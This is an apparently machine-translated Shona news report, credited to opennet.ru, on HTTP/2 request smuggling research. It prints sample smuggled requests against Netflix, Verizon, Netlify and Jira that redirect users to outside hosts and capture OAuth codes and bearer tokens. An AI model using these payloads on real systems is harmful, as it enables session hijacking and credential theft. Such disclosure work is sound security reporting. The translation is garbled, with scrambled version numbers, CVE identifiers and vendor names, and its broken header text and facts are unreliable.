Webhu masisitimu umo kumberi kunogashira kubatana kuburikidza neHTTP/2 uye kuaendesa kubackend kuburikidza neHTTP/1.1 akafumurwa kune mutsva musiyano we "HTTP Chikumbiro Smuggling" kurwisa, iyo inobvumira, nekutumira zvakagadzirirwa zvakagadzirirwa zvikumbiro zvevatengi, wedge mune zviri mukati mezvikumbiro kubva kune vamwe vashandisi zvakagadziriswa mukuyerera kwakafanana pakati pemberi uye backend. Kurwiswa kwacho kunogona kushandiswa kuisa yakashata JavaScript kodhi muchikamu newebhusaiti iri pamutemo, bypass yekuwana zvirambidzo masisitimu uye kubata maparamita echokwadi.
Dambudziko rinokanganisa webhu proxies, mitoro inotakura, webhu inomhanyisa, masisitimu ekutumira zvemukati uye zvimwe zvigadziriso umo zvikumbiro zvinotungamirwa nenzira yekumberi-kumashure-kumashure. Munyori wechidzidzo ichi akaratidza mukana wekurwisa masisitimu eNetflix, Verizon, Bitbucket, Netlify CDN neAtlassian, uye akagamuchira zviuru makumi mashanu nezvitanhatu zvemadhora muzvirongwa zvemubairo wekuona kusasimba. Dambudziko rakasimbiswa zvakare muF56 Networks zvigadzirwa. Dambudziko rinokanganisa zvishoma mod_proxy muApache http server (CVE-5-2021), gadziriso inotarisirwa mushanduro 33193 (vagadziri vakaziviswa nezvedambudziko mukutanga kwaMay uye vakapihwa 2.4.49 mwedzi yekuigadzirisa). Mu nginx, kugona kutsanangura panguva imwe chete iyo "Content-Length" uye "Transfer-Encoding" misoro yakavharwa mukuburitswa kwekupedzisira (3). Maturusi ekurwisa atoverengerwa muBurp toolkit uye anowanikwa nenzira yeTurbo Intruder yekuwedzera.
Nheyo yekushanda kweiyo nzira nyowani yekuchata zvikumbiro mutraffic yakafanana nenjodzi yakaonekwa nemuongorori mumwechete makore maviri apfuura, asi yakaganhurirwa kune kumberi kunobvuma zvikumbiro pamusoro peHTTP/1.1. Ngatiyeukei kuti muchirongwa chemberi-backend, zvikumbiro zvevatengi zvinogamuchirwa neimwe node - iyo yekumberi, iyo inogadza yekugara kwenguva refu TCP kubatana neiyo backend, iyo inogadzirisa zvikumbiro zvakananga. Kuburikidza nekubatana uku kwakajairwa, zvikumbiro zvevashandisi vakasiyana zvinowanzoendeswa, izvo zvinotevera ketani imwe neimwe, yakaparadzaniswa nenzira yeHTTP protocol.
Yechinyakare "HTTP Chikumbiro Kuverevedza" kurwiswa kwakavakirwa pachokwadi chekuti kumberi uye kumashure kunodudzira kushandiswa kwemisoro yeHTTP "Content-Length" (inoteya saizi yese yedata muchikumbiro) uye "Transfer-Encoding: chunked" (inobvumira. data inofanira kutamiswa muzvikamu) zvakasiyana. . Semuyenzaniso, kana iyo yekumberi ichingotsigira "Content-Length" asi ichirega "Transfer-Encoding: chunked", munhu anorwisa anogona kutumira chikumbiro chine ese "Content-Length" uye "Transfer-Encoding: chunked" misoro, asi. saizi i "Content-Length" haienderane nehukuru hwechunked cheni. Muchiitiko ichi, iyo yekumberi ichagadzirisa uye inotungamira chikumbiro zvinoenderana ne "Content-Length", uye iyo yekumashure inomirira kupedzwa kwechivharo chakavakirwa pa "Transfer-Encoding: chunked" uye muswe wasara wechikumbiro cheanorwisa. iva pakutanga kwechikumbiro chemumwe munhu chinozotumirwa chinotevera.
Kusiyana neiyo text protocol HTTP/1.1, iyo yakakamurwa padanho remutsara, HTTP/2 ibhinari protocol uye inoshandura mabhuraki edata esaizi yakafanotaurwa. Nekudaro, HTTP/2 inoshandisa pseudo-misoro inoenderana neyakajairika HTTP misoro. Panyaya yekudyidzana neiyo backend kuburikidza neHTTP/1.1 protocol, iyo yekumberi inoshandura aya pseudo-misoro mune yakafanana HTTP misoro HTTP/1.1. Dambudziko nderekuti iyo backend inoita sarudzo pamusoro pekuparura rukova zvichibva pamisoro yeHTTP yakaiswa nemberi, isina ruzivo nezve maparamita echikumbiro chekutanga.
Kunyanya, kukosha "kureba-kureba" uye "kuchinjisa-encoding" kunogona kufambiswa nenzira yepseudo-misoro, kunyangwe isisashandiswe muHTTP/2, sezvo saizi yedata yese yakatemwa. mumunda wakasiyana. Nekudaro, panguva yekushandura chikumbiro cheHTTP/2 kuHTTP/1.1, misoro iyi inotakurwa uye inogona kuvhiringa backend. Pane maviri makuru ekurwisa akasiyana: H2.TE neH2.CL, umo iyo yekumashure inotsauswa neiyo isiriyo yekuchinjisa-encoding kana yemukati-urefu kukosha isingaenderane nehukuru chaihwo hwemutumbi wekukumbira unogashirwa nemberi kuburikidza ne HTTP/2 protocol.
Muenzaniso wekurwiswa kweH2.CL ndeyekutsanangura saizi isiriyo mune yemukati-urefu pseudo-musoro paunenge uchitumira chikumbiro cheHTTP/2 kuNetflix. Chikumbiro ichi chinotungamira kukuwedzera kweiyo yakafanana HTTP musoro Wemukati-Kureba kana uchinge uchiwana backend kuburikidza neHTTP/1.1, asi sezvo saizi muMukati-Kureba inotsanangurwa zvishoma pane iyo chaiyo, chikamu che data mumuswe chinogadziriswa se kutanga kwechikumbiro chinotevera.
Semuenzaniso, kumbira HTTP/2 :nzira POST :nzira /n :chiremera www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Zvichaita kuti chikumbiro chitumirwe kubackend: POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Sezvo Content-Length ine kukosha kwe4, iyo backend ichagamuchira chete "abcd" semutumbi wechikumbiro, uye imwe yese ye "GET /n HTTP/1.1..." ichagadziriswa sekutanga kwechikumbiro chinotevera. yakabatana nemumwe mushandisi. Saizvozvo, rukova rwunozove desynchronized uye mukupindura kune chinotevera chikumbiro, mhedzisiro yekugadzirisa chikumbiro che dummy ichapihwa. Panyaya yeNetflix, kutsanangura munhu wechitatu-bato mu "Host:" musoro muchikumbiro chedummy zvakakonzera kuti mutengi adzose mhinduro "Nzvimbo: https://02.rs?x.netflix.com/n" uye inobvumidza zvemukati kuti zvitumirwe kumutengi, kusanganisira Mhanya yako JavaScript kodhi mumamiriro eiyo Netflix saiti.
Yechipiri yekurwisa sarudzo (H2.TE) inosanganisira kutsiva iyo "Shandura-Encoding: chunked" musoro. Iko kushandiswa kweyekuchinjisa-encoding pseudo-musoro muHTTP/2 kunorambidzwa netsanangudzo uye zvikumbiro nazvo zvakatemerwa kuti zvibatwe sezvisina kunaka. Pasinei neizvi, mamwe magadzirirwo epamberi haatore ichi chinodiwa uye anobvumira kushandiswa kwekutumira-encoding pseudo-header muHTTP/2, iyo inoshandurwa kuita yakafanana HTTP musoro. Kana paine "Shandura-Encoding" musoro, iyo yekumashure inogona kuitora sechinhu chinonyanya kukosha uye kupatsanura data chidimbu nechidimbu mu "chunked" modhi uchishandisa mabhuroko ehukuru hwakasiyana mufomati "{size}\r\n{block. }\r\n{size} \r\n{block}\r\n0", zvisinei nekupatsanurwa kwekutanga nehukuru hwese.
Kuvapo kwemukana wakadaro kwakaratidzwa nemuenzaniso weVerizon. Dambudziko rine chekuita nekutendeseka portal uye zvemukati manejimendi system, iyo inoshandiswa zvakare panzvimbo dzakadai seHuffington Post uye Engadget. Semuenzaniso, chikumbiro chemutengi kuburikidza neHTTP/2: :nzira POST :nzira /identitfy/XUI :mvumo id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=
Zvakaguma nekutumira chikumbiro cheHTTP/1.1 kubackend: POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres. mambure Zvemukati- Kureba: 10x=
Iyo yekumashure, zvakare, yakafuratira iyo "Content-Length" musoro uye ikaita-murukova kupatsanura zvichibva pa "Transfer-Encoding: chunked". Mukuita, kurwiswa kwacho kwakaita kuti zvikwanise kutungamira zvikumbiro zvevashandisi kuwebhusaiti yavo, kusanganisira kubvunzurudza zvikumbiro zvine chekuita neOAuth authentication, iyo paramita yakaratidzwa muReferer header, pamwe nekuenzanisa chikamu chechokwadi uye kukonzeresa sisitimu yevashandisi kutumira magwaro. kumuridzi weanorwisa. GET /b2blanding/show/oops HTTP/1.1 Host: psres.net Referer: https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 Host: psres.net Mvumo: Bearer eyJhcGwiOiJIUzI1GiCI1sIkInR6…
Kurwisa mashandisirwo eHTTP/2 asingatenderi kuendesa-encoding pseudo-header kutsanangurwa, imwe nzira yakatsanangurwa inosanganisira kutsiva iyo "Shandura-Encoding" musoro nekuisungirira kune mamwe pseudo-misoro yakapatsanurwa neiyo nyowani mutsara ( kana yashandurwa kuita HTTP/1.1 mune iyi kesi inogadzira maviri akaparadzana HTTP misoro).
Semuyenzaniso, Atlassian Jira neNetlify CDN (yaishandiswa kushandira peji rekutanga reMozilla muFirefox) vakabatwa nedambudziko iri. Kunyanya, chikumbiro cheHTTP/2 :nzira POST :nzira / :mvumo start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n Content-Length: 5\r\n \r\nx=
zvakakonzera kuti chikumbiro cheHTTP/1.1 POST/HTTP/1.1 chitumirwe kuseri\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r \nx=
Imwe sarudzo yekutsiva iyo "Shandura-Encoding" musoro yaive yekuibatanidza kuzita reimwe pseudo-musoro kana kumutsetse une nzira yekukumbira. Semuenzaniso, kana uchiwana Atlassian Jira, zita rekunyepedzera remusoro "foo: bar\r\ntransfer-encoding" ine kukosha "chunked" yakaita kuti misoro yeHTTP "foo: bar" uye "transfer-encoding: chunked" iwedzerwe. , uye kutsanangura pseudo-header ": nzira" kukosha "GET / HTTP/1.1\r\nTransfer-encoding: chunked" yakashandurwa kuti "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Muongorori akaona dambudziko akakurudzirawo nzira yekukumbira nzira yekurwisa kumberi, umo imwe neimwe kero yeIP inomisikidza kubatana kwakasiyana kune backend uye traffic kubva kune vakasiyana vashandisi haina kusanganiswa. Iyo nzira yakarongwa haibvumire kupindira nezvikumbiro kubva kune vamwe vashandisi, asi inoita kuti zvikwanise kuisa chepfu cache yakagovaniswa inokanganisa kugadzirisa kwezvimwe zvikumbiro, uye inobvumira kutsiviwa kwemukati memusoro weHTTP unoshandiswa kuendesa ruzivo rwesevhisi kubva kumberi kuenda kubackend ( semuenzaniso, kana uchisimbisa padivi remberi mune Misoro yakadaro inogona kutumira ruzivo nezve mushandisi wezvino kubackend). Semuenzaniso wekushandisa nzira mukuita, kushandisa cache chepfu, zvaive zvichikwanisika kuwana kutonga pamusoro pemapeji mubasa reBitbucket.
Source: opennet.ru